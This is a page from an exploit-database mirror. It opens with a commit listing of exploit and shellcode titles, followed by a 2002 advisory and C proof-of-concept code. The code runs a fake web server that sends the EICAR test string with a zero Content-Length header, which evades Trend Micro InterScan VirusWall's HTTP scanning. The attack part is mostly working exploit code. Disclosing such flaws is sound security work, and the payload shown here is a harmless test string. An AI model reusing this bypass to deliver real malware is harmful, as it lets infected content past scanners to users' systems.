exploit-db-mirror/exploits/multiple/remote/21339.c
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

115 lines
No EOL
3.4 KiB
C

// source: https://www.securityfocus.com/bid/4265/info
Trend Micro InterScan VirusWall is a high performance internet gateway virus scanning package. It is capable of scanning incoming content over HTTP, SMTP and FTP for viruses and malicious code.
A vulnerability has been reported in some versions of VirusWall. An option exists called "Skip scanning if Content-length equals 0", which is enabled by default. A malicious web server may return infected content with this header set to 0, and bypass the VirusWall scanner. As many popular client programs will ignore this header and display the content, this may allow malicious content to bypass VirusWall and still be interpreted by a client system.
Other versions of VirusWall may share this vulnerability. This has not been confirmed.
/*
Trend Micro InterScan VirusWall HTTP proxy content scanning circumvention proof of concept code
Copyright 2002 Jochen Bauer, Inside Security IT Consulting GmbH <jtb@inside-security.de>
Compiled and tested on SuSE Linux 7.3
This program is for testing purposes only, any other use is prohibited!
*/
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#define BUFFERSIZE 4096
int main(int argc,char *argv[])
{
int new,dummy,n,s;
unsigned short port;
struct sockaddr_in remote,local;
struct in_addr remote_ip;
char *remote_host,*recvbuffer,*sendbuffer;
char header[]="HTTP/1.0 200 OK\r\nConnection: close\r\nContent-Type: application/binary\r\nContent-Length: 0\r\n\r\n";
char eicar[]="X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
/*get port number from cmdline*/
if(argv[1]==NULL)
{
printf("Usage: %s port\n",argv[0]);
exit(1);
}
else
port=atoi(argv[1]);
printf("Fake web server starting......\n");
/*get a socket*/
s=socket(AF_INET,SOCK_STREAM,6);
if(s<0)
{
perror("socket");
exit(-1);
}
/*bind socket to a local port*/
local.sin_family=AF_INET;
local.sin_port=htons(port);
local.sin_addr.s_addr=htonl(INADDR_ANY);
n=bind(s,(struct sockaddr *)&local,sizeof(struct sockaddr));
if(n<0)
{
perror("bind");
exit(-1);
}
/*initiate listening on socket*/
n=listen(s,5);
if(n<0)
{
perror("listen");
exit(-1);
}
printf("Listening on port %i/tcp\n",port);
/*accept connections on socket*/
new=accept(s,(struct sockaddr *)&remote,&dummy);
if(new<0)
{
perror("accept");
exit(-1);
}
/*print connection info*/
remote_host=(char *)calloc(24,1);
remote_ip.s_addr=remote.sin_addr.s_addr;
strncpy(remote_host,inet_ntoa(remote_ip),24);
printf("connection from: %s\n",remote_host);
/*get data*/
recvbuffer=calloc(BUFFERSIZE,1);
n=recv(new,recvbuffer,BUFFERSIZE,0);
recvbuffer[n]=0; /*terminate string*/
printf("\nData from Browser:\n");
printf("%s\n",recvbuffer);
/*send eicar virus*/
sendbuffer=calloc(BUFFERSIZE,1);
strcat(sendbuffer,header);
strcat(sendbuffer,eicar);
printf("sending: \n%s\n",sendbuffer);
n=write(new,sendbuffer,strlen(sendbuffer));
/*clean up*/
printf("Terminating.\n");
close(new);
close(s);
return(0);
}